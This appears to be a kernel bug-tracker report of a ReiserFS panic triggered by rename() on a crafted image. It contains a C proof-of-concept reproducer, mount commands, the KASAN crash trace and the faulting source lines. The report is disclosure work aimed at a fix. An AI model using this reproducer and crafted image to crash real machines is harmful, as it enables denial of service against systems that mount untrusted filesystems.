Bug 200343 - kernel panic in entry_points_to_object() when rename() file on a reiserfs filesystem
Summary: kernel panic in entry_points_to_object() when rename() file on a reiserfs filesystem
Status: NEW
Alias: None
Product: File System
Classification: Unclassified
Component: ReiserFS (show other bugs)
Hardware: All Linux
: P1 normal
Assignee: ReiserFS developers team
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-06-28 20:31 UTC by Wen Xu
Modified: 2018-06-28 20:31 UTC (History)

See Also:
Kernel Version: 4.18
Subsystem:
Regression: No
Bisected commit-id:


Attachments
The (compressed) crafted image which causes crash (66.11 KB, application/zip)
2018-06-28 20:31 UTC, Wen Xu

Description Wen Xu 2018-06-28 20:31:53 UTC
Created attachment 276997 [details]
The (compressed) crafted image which causes crash

- Reproduce (run as root inside a disposable VM: the image is untrusted and the rename below panics the kernel, taking the whole machine down)
# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 154.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

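/*
 * Trigger the reiserfs_rename() path the crafted image is built for:
 * rename <mpoint>/foo/bar/baz to <mpoint>/foo/baz.
 *
 * mpoint: mount point of the image (argv[1] in main()); must be non-NULL.
 *
 * On a healthy filesystem this is an ordinary rename; the panic reported
 * above only happens with the directory entries on the attached image.
 * Unlike the original PoC, allocation and rename failures are reported on
 * stderr instead of silently ignored, so a run that never reached the
 * syscall (bad path, wrong mount point) is distinguishable from one that
 * simply did not reproduce.  The paths are built with snprintf() rather than
 * the GNU-only asprintf() so the program is plain C11.
 */
static void activity(char *mpoint) {
  static const char src_suffix[] = "/foo/bar/baz";
  static const char dst_suffix[] = "/foo/baz";
  size_t base_len;
  char *src = NULL;
  char *dst = NULL;

  if (mpoint == NULL) {
    fprintf(stderr, "activity: mount point is NULL\n");
    return;
  }

  base_len = strlen(mpoint);
  /* sizeof of the string literal already counts the terminating NUL. */
  src = malloc(base_len + sizeof src_suffix);
  dst = malloc(base_len + sizeof dst_suffix);
  if (src == NULL || dst == NULL) {
    fprintf(stderr, "activity: out of memory\n");
    goto out;
  }

  snprintf(src, base_len + sizeof src_suffix, "%s%s", mpoint, src_suffix);
  snprintf(dst, base_len + sizeof dst_suffix, "%s%s", mpoint, dst_suffix);

  if (rename(src, dst) != 0) {
    fprintf(stderr, "rename(%s, %s): %s\n", src, dst, strerror(errno));
  }

out:
  free(src);
  free(dst);
}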

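/*
 * Entry point: ./poc <mount-point>
 *
 * Requires exactly one non-empty argument, the mount point of the crafted
 * image.  Without the check, a missing argument passed argv[1] == NULL into
 * activity(); now it exits non-zero with a usage line instead.
 */
int main(int argc, char *argv[]) {
  if (argc != 2 || argv[1][0] == '\0') {
    fprintf(stderr, "usage: %s <mount-point>\n", argc > 0 ? argv[0] : "poc");
    return EXIT_FAILURE;
  }
  activity(argv[1]);
  return EXIT_SUCCESS;
}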

- Kernel message
[  341.337045] REISERFS (device loop0): found reiserfs format "3.6" with standard journal
[  341.337109] REISERFS (device loop0): using ordered data mode
[  341.337115] reiserfs: using flush barriers
[  341.338556] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30
[  341.340934] REISERFS (device loop0): checking transaction log (loop0)
[  342.285551] REISERFS (device loop0): Using r5 hash to sort names
[  358.439533] REISERFS panic (device loop0): vs-7042 entry_points_to_object: entry must be visible
[  358.439609] ------------[ cut here ]------------
[  358.439613] kernel BUG at fs/reiserfs/prints.c:369!
[  358.441701] invalid opcode: 0000 [#1] SMP KASAN PTI
[  358.442735] CPU: 0 PID: 1426 Comm: a.out Not tainted 4.18.0-rc1+ #8
[  358.444005] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  358.445950] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  358.446907] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 
[  358.450650] RSP: 0018:ffff8801deddf448 EFLAGS: 00010286
[  358.452016] RAX: 0000000000000054 RBX: ffffffffa693a200 RCX: 0000000000000000
[  358.453438] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003bdbbe7f
[  358.470539] RBP: ffff8801deddf4f8 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  358.471979] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801e8ba3b80
[  358.473398] R13: ffffffffa693a940 R14: 0000000000000003 R15: ffff8801d0b86500
[  358.474835] FS:  00007f12bd2fa700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  358.476433] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  358.477578] CR2: 00000000020f0008 CR3: 00000001e7704000 CR4: 00000000000006f0
[  358.479010] Call Trace:
[  358.479529]  ? reiserfs_debug+0x10/0x10
[  358.480313]  entry_points_to_object+0xfd/0x120
[  358.481209]  reiserfs_rename+0x924/0xfc0
[  358.482004]  ? search_by_key+0x13b5/0x19d0
[  358.482842]  ? reiserfs_create+0x3d0/0x3d0
[  358.483703]  ? __asan_loadN+0xf/0x20
[  358.484441]  ? pathrelse+0x70/0x70
[  358.485161]  ? unwind_get_return_address+0x36/0x50
[  358.486136]  ? __save_stack_trace+0x92/0x100
[  358.487017]  ? __asan_loadN+0xf/0x20
[  358.487746]  ? search_by_entry_key+0x20c/0x4b0
[  358.488643]  ? __asan_loadN+0xf/0x20
[  358.489378]  ? kasan_check_write+0x14/0x20
[  358.490237]  ? blk_mq_debugfs_unregister_sched_hctx+0x50/0x50
[  358.491429]  ? _cond_resched+0x1a/0x50
[  358.492206]  vfs_rename+0xa70/0xda0
[  358.492921]  ? vfs_rename+0xa70/0xda0
[  358.493667]  ? path_mountpoint+0x940/0x940
[  358.494498]  ? kasan_check_write+0x14/0x20
[  358.495354]  ? security_path_rename+0xcb/0x130
[  358.496257]  do_renameat2+0x7d2/0x860
[  358.497004]  ? user_path_create+0x40/0x40
[  358.497836]  ? __vma_link_rb+0x12a/0x160
[  358.498640]  ? userfaultfd_unmap_complete+0x9c/0x1d0
[  358.499655]  ? handle_mm_fault+0x24b/0x380
[  358.500496]  ? mm_fault_error+0x1f0/0x1f0
[  358.501314]  ? vm_brk+0x20/0x20
[  358.501959]  __x64_sys_rename+0x3b/0x50
[  358.502764]  do_syscall_64+0x78/0x170
[  358.503523]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  358.504556] RIP: 0033:0x7f12bcd80367
[  358.505283] Code: 75 12 48 89 df e8 a9 d7 08 00 85 c0 0f 95 c0 0f b6 c0 f7 d8 5b c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b8 52 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 01 8b 35 00 f7 d8 64 89 01 48 
[  358.509030] RSP: 002b:00007ffed9c1c9f8 EFLAGS: 00000202 ORIG_RAX: 0000000000000052
[  358.510521] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f12bcd80367
[  358.511950] RDX: 00000000020f00a0 RSI: 00000000020f00a0 RDI: 00000000020f0080
[  358.513359] RBP: 00007ffed9c1ca30 R08: 00000000020f0010 R09: 0000000000000000
[  358.514779] R10: 0000000000000640 R11: 0000000000000202 R12: 0000000000400530
[  358.516190] R13: 00007ffed9c1cb30 R14: 0000000000000000 R15: 0000000000000000
[  358.517602] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  358.527284] ---[ end trace 2e85051acb5f6dc1 ]---
[  358.528655] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  358.529693] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 
[  358.533670] RSP: 0018:ffff8801deddf448 EFLAGS: 00010286
[  358.534837] RAX: 0000000000000054 RBX: ffffffffa693a200 RCX: 0000000000000000
[  358.536320] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003bdbbe7f
[  358.537750] RBP: ffff8801deddf4f8 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  358.539185] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801e8ba3b80
[  358.540646] R13: ffffffffa693a940 R14: 0000000000000003 R15: ffff8801d0b86500
[  358.542084] FS:  00007f12bd2fa700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  358.543738] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  358.544901] CR2: 00000000020f0008 CR3: 00000001e7704000 CR4: 00000000000006f0

- Location (fs/reiserfs/namei.c, entry_points_to_object(); the "latest" link below may drift from the 4.18 line number). The visibility bit of the on-disk directory entry is trusted as an invariant and the failed check is escalated to reiserfs_panic(), which is a kernel BUG, so a crafted image gives anyone who can get it mounted a kernel DoS. Treating the unexpected state as on-disk corruption (error return / marking the fs read-only) rather than panicking would be the expected hardening:
https://elixir.bootlin.com/linux/latest/source/fs/reiserfs/namei.c#L1278
	if (inode) {
		if (!de_visible(de->de_deh + de->de_entry_num))
			reiserfs_panic(inode->i_sb, "vs-7042",
				       "entry must be visible");
		return (de->de_objectid == inode->i_ino) ? 1 : 0;
	}

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
